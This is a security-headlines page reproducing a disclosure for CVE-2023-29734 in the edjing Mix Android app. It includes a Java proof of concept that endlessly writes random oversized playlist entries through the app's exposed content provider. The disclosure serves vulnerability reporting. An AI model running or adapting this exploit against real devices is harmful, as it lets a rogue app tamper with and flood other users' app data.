Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-29734: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs

An issue found in edjing Mix v.7.09.01 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the database.

CVE
#vulnerability#android#google#auth

Escalation of Privileges exists in edjing Mix(CVE-2023-29734)

Vendor:MWM(http://www.edjing.com/)

Affected product:edjing Mix(com.edjing.edjingdjturntable)

Version:7.09.01

Download link:https://play.google.com/store/apps/details?id=com.edjing.edjingdjturntable

Description of the vulnerability for use in the CVE:An issue found in edjing Mix v.7.09.01 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the database.

poc:

public void attack(){ while (true) { ContentResolver contentResolver = this.getApplicationContext().getContentResolver(); String randomString =getRandomString(52); String randomString2 =getRandomString(5120); Uri uri = Uri.parse(“content://com.edjing.edjingdjturntable/playlist”); ContentValues contentValues = new ContentValues(); contentValues.put("playlist_id",3); contentValues.put("playlist_date_modified",1314234); contentValues.put("playlist_date_added",123456); contentValues.put("playlist_state",0); contentValues.put("playlist_name",randomString2); contentResolver.update(uri,contentValues,null,null); } }

public static String getRandomString(int length) { String str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; Random random = new Random(); StringBuffer sb = new StringBuffer(); for (int i = 0; i < length; i++) { int number = random.nextInt(62); sb.append(str.charAt(number)); } return sb.toString(); }

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907